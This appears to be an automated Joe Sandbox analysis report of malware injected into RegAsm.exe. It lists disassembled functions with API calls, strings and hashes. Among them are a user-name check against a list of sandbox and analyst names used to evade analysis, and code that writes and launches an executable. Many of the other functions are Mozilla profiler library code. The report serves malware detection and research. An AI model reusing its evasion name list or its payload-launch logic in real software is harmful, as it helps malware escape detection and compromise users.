API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: b358c81918caedcc491cb350930e2309e8078b35a00ec52755cc7c3e72e461c7
Instruction ID: 25241662839d43792b2c77ef21fbd537d483292777fa1af6ba2b52d0842de2c3
Opcode Fuzzy Hash: b358c81918caedcc491cb350930e2309e8078b35a00ec52755cc7c3e72e461c7
Instruction Fuzzy Hash: B6A15775B002048FDB109F28C944BAA77F9FF86318F505029F96A87B91DF34B825CBA1

Function 00401927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00401A13
lstrcmpiA.KERNEL32(0043ABCC,?), ref: 00401A2E

Strings

Johnson, xrefs: 00401987
maltest, xrefs: 004019D7
Sand box, xrefs: 00401955
HAPUBWS, xrefs: 00401969
timmy, xrefs: 004019AF
virus, xrefs: 004019EB
CurrentUser, xrefs: 0040194B
Miller, xrefs: 00401991
Emily, xrefs: 0040195F
IT-ADMIN, xrefs: 0040197D
Hong Lee, xrefs: 00401973
sandbox, xrefs: 004019C3
user, xrefs: 004019B9
WDAGUtilityAccount, xrefs: 004019FF
Peter Wilson, xrefs: 004019A5
malware, xrefs: 004019CD
milozs, xrefs: 0040199B
test user, xrefs: 004019E1
John Doe, xrefs: 004019F5

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
Instruction ID: b7e7ac9f27e83d335140a50ac772a364dc2a7579303695bb9c42e1fce2a6af08
Opcode Fuzzy Hash: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
Instruction Fuzzy Hash: B42103B094526C8BCB20CF159D4C6DDBBB5AB5D308F00B1DAD1886A210C7B85ED9CF4D

Function 6C05F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C05F8F9

Part of subcall function 6C026390: GetCurrentThreadId.KERNEL32 ref: 6C0263D0
Part of subcall function 6C026390: AcquireSRWLockExclusive.KERNEL32 ref: 6C0263DF
Part of subcall function 6C026390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C02640E

ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F93A
GetCurrentThreadId.KERNEL32 ref: 6C05F98A
GetCurrentThreadId.KERNEL32 ref: 6C05F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05F716

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

Part of subcall function 6C01B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C01B5E0

GetCurrentThreadId.KERNEL32 ref: 6C05F739
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05F746
GetCurrentThreadId.KERNEL32 ref: 6C05F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C09385B,00000002,?,?,?,?,?), ref: 6C05F829
free.MOZGLUE(?,?,00000000,?), ref: 6C05F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C05F866
free.MOZGLUE(?), ref: 6C05FA0C

Part of subcall function 6C025E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0255E1), ref: 6C025E8C
Part of subcall function 6C025E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C025E9D
Part of subcall function 6C025E60: GetCurrentThreadId.KERNEL32 ref: 6C025EAB
Part of subcall function 6C025E60: GetCurrentThreadId.KERNEL32 ref: 6C025EB8
Part of subcall function 6C025E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C025ECF
Part of subcall function 6C025E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C025F27
Part of subcall function 6C025E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C025F47
Part of subcall function 6C025E60: GetCurrentProcess.KERNEL32 ref: 6C025F53
Part of subcall function 6C025E60: GetCurrentThread.KERNEL32 ref: 6C025F5C
Part of subcall function 6C025E60: GetCurrentProcess.KERNEL32 ref: 6C025F66
Part of subcall function 6C025E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C025F7E

free.MOZGLUE(?), ref: 6C05F9C5
free.MOZGLUE(?), ref: 6C05F9DA

Strings

Thread , xrefs: 6C05F789
" attempted to re-register as ", xrefs: 6C05F858
[D %d/%d] profiler_register_thread(%s), xrefs: 6C05F71F
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C05F9A6

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 7aba2ce90bcafdd26798bf7abbee93df8bb80e7bd28ab11e6dfc4dd046b75d5c
Instruction ID: 8878e571731b4588c754f233ca72147056283323f3d71d7eb6854aedc3fa46c2
Opcode Fuzzy Hash: 7aba2ce90bcafdd26798bf7abbee93df8bb80e7bd28ab11e6dfc4dd046b75d5c
Instruction Fuzzy Hash: 688112B46047009FDB10DF24C840BAEB7F9FF89308F80456DE8498BB51EB34A959CB92

Function 0041260C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

_memset.LIBCMT ref: 004127B1
lstrcatA.KERNEL32(?,?,?,?,?), ref: 004127C3
lstrcatA.KERNEL32(?,00436698), ref: 004127D5
lstrcatA.KERNEL32(?,4b74261d834413e886f920a1e9dc5b33), ref: 004127E7
lstrcatA.KERNEL32(?,0043669C), ref: 004127F9
lstrcatA.KERNEL32(?,?), ref: 00412809
lstrcatA.KERNEL32(?,004366A0), ref: 0041281B
lstrlenA.KERNEL32(?), ref: 00412824
lstrcatA.KERNEL32(?,EMPTY), ref: 00412840
lstrcatA.KERNEL32(?,004366AC), ref: 00412852
lstrcatA.KERNEL32(?,?), ref: 00412862
lstrcatA.KERNEL32(?,004366B0), ref: 00412874
lstrlenA.KERNEL32(?), ref: 00412881
_memset.LIBCMT ref: 004128B7

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,004366B4,?), ref: 00412924
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412932

Strings

.exe, xrefs: 0041264F
4b74261d834413e886f920a1e9dc5b33, xrefs: 004127DB
EMPTY, xrefs: 0041283A

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
String ID: .exe$4b74261d834413e886f920a1e9dc5b33$EMPTY
API String ID: 141474312-4192118096
Opcode ID: 7423630355bc0ae080dcc3895a676b474c595fadf28ca0ec63f6465bb34c18d8
Instruction ID: 30b7237e4d63740a0c3ffa21d4e9ba1d0fd5571b7a7901b34f1eecf9535dda31
Opcode Fuzzy Hash: 7423630355bc0ae080dcc3895a676b474c595fadf28ca0ec63f6465bb34c18d8
Instruction Fuzzy Hash: 99814FB2E40129ABCF11EF61DD46ACD7779AB08309F4054BAB708B3051D679AFC98F58

Function 6C024180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C024196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0241F1
VerSetConditionMask.NTDLL ref: 6C024223
VerSetConditionMask.NTDLL ref: 6C02422A
VerSetConditionMask.NTDLL ref: 6C024231
VerSetConditionMask.NTDLL ref: 6C024238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C024245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C024263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C02427A
FreeLibrary.KERNEL32(?), ref: 6C024299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0242C4
VerSetConditionMask.NTDLL ref: 6C0242F6
VerSetConditionMask.NTDLL ref: 6C024302
VerSetConditionMask.NTDLL ref: 6C024309
VerSetConditionMask.NTDLL ref: 6C024310
VerSetConditionMask.NTDLL ref: 6C024317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C024324

Strings

Shcore.dll, xrefs: 6C02425E
SetProcessDpiAwareness, xrefs: 6C024274

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 00fca00730e0b1105b2d57056603c86c095adfb56a3c3a84d583bea79fd52754
Instruction ID: 2c58a8a40978315e7fd8b28cf97785c6d53b65e766b7405e16439433f2dd1b85
Opcode Fuzzy Hash: 00fca00730e0b1105b2d57056603c86c095adfb56a3c3a84d583bea79fd52754
Instruction Fuzzy Hash: E151E271A442246BEB106FA58C48FAE77FCEF86714F114618FA16AB6C0DF789D448A90

Function 6C05EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05EE60
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05EE6D
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C05EEA5
CloseHandle.KERNEL32(?), ref: 6C05EEB4
free.MOZGLUE(00000000), ref: 6C05EEBB
GetCurrentThreadId.KERNEL32 ref: 6C05EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05EECF

Part of subcall function 6C05DE60: GetCurrentThreadId.KERNEL32 ref: 6C05DE73
Part of subcall function 6C05DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C024A68), ref: 6C05DE7B
Part of subcall function 6C05DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C024A68), ref: 6C05DEB8
Part of subcall function 6C05DE60: free.MOZGLUE(00000000,?,6C024A68), ref: 6C05DEFE
Part of subcall function 6C05DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C05DF38

Part of subcall function 6C04CBE8: GetCurrentProcess.KERNEL32(?,6C0131A7), ref: 6C04CBF1
Part of subcall function 6C04CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0131A7), ref: 6C04CBFA

GetCurrentThreadId.KERNEL32 ref: 6C05EF1E
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05EF2B
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05EF59
GetCurrentThreadId.KERNEL32 ref: 6C05EFB0
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05EFBD
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C05EFE1
GetCurrentThreadId.KERNEL32 ref: 6C05EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05F000

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C05F02F

Part of subcall function 6C05F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C05F09B
Part of subcall function 6C05F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C05F0AC
Part of subcall function 6C05F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C05F0BE

Strings

[I %d/%d] profiler_stop, xrefs: 6C05EED7
[I %d/%d] profiler_pause, xrefs: 6C05F008

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: f75a5a785cc217abedae26458c46028e11910c900da1dd4481f9119e344c407a
Instruction ID: d6bc9e4b67bb4c89138a596aa39ab278b331a1f7fa37bc0cb67516f02ba9b724
Opcode Fuzzy Hash: f75a5a785cc217abedae26458c46028e11910c900da1dd4481f9119e344c407a
Instruction Fuzzy Hash: 5351E5357042109FDB109F64D5087AA77FCFB46329F542529F96A83B80DF796824CBE2

Function 6C04D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C09E804), ref: 6C04D047
GetSystemInfo.KERNEL32(?), ref: 6C04D093
__Init_thread_footer.LIBCMT ref: 6C04D0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C09E810,00000040), ref: 6C04D0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6C09E7B8,00001388), ref: 6C04D147
InitializeCriticalSectionAndSpinCount.KERNEL32(6C09E744,00001388), ref: 6C04D162
InitializeCriticalSectionAndSpinCount.KERNEL32(6C09E784,00001388), ref: 6C04D18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6C09E7DC,00001388), ref: 6C04D1B1

Strings

<jemalloc>, xrefs: 6C04D268, 6C04D311
Compile-time page size does not divide the runtime one., xrefs: 6C04D26D
MOZ_CRASH(), xrefs: 6C04D277
MALLOC_OPTIONS, xrefs: 6C04D0CB
: (malloc) Unsupported character in malloc options: ', xrefs: 6C04D322

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 786b371b5aacc2ce698faef9ff7720be1df37d204d1e29e97c82a234a09e1f99
Instruction ID: 27c89b3c5c3cf6790d4306f1c59b9c5f1c28c88c69ec320333c54e612f78504e
Opcode Fuzzy Hash: 786b371b5aacc2ce698faef9ff7720be1df37d204d1e29e97c82a234a09e1f99
Instruction Fuzzy Hash: 6D81E070B04300DBEB109FA8C954BAAB7F5FB56708F10A539EA2597B80DB709D05CB92

Function 004139C2 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 127stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
ExitProcess.KERNEL32 ref: 004139E2
strtok_s.MSVCRT ref: 004139F3

Strings

DwA, xrefs: 004139EC, 004139EF
block, xrefs: 004139CB

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: DwA$block
API String ID: 3407564107-4170876926
Opcode ID: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
Instruction ID: 9e2abf34b02cddae1b0fa04c6dc88f1d30775994422634f8dc56bb1647053282
Opcode Fuzzy Hash: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
Instruction Fuzzy Hash: 7B414F70A48306BBEB44DF60DC49E9A7B6CFB1870BB206166E402D2151FB39B781DB58

Function 0041B870 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,74DE83C0,00000000,0041C55B,?), ref: 0041B875
StrCmpCA.SHLWAPI(74DE83C0,0043613C), ref: 0041B8A3
StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0041B8B3
StrCmpCA.SHLWAPI(74DE83C0,.zoo), ref: 0041B8BF
StrCmpCA.SHLWAPI(74DE83C0,.arc), ref: 0041B8CB
StrCmpCA.SHLWAPI(74DE83C0,.lzh), ref: 0041B8D7
StrCmpCA.SHLWAPI(74DE83C0,.arj), ref: 0041B8E3
StrCmpCA.SHLWAPI(74DE83C0,.gz), ref: 0041B8EF
StrCmpCA.SHLWAPI(74DE83C0,.tgz), ref: 0041B8FB

Strings

.arj, xrefs: 0041B8DD
.arc, xrefs: 0041B8C5
.gz, xrefs: 0041B8E9
.tgz, xrefs: 0041B8F5
.zip, xrefs: 0041B8AD
.zoo, xrefs: 0041B8B9
.lzh, xrefs: 0041B8D1

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction ID: 4d0ab467417de3272ea9e1328912bf8f077e80ad604b43416a02b9711c478325
Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
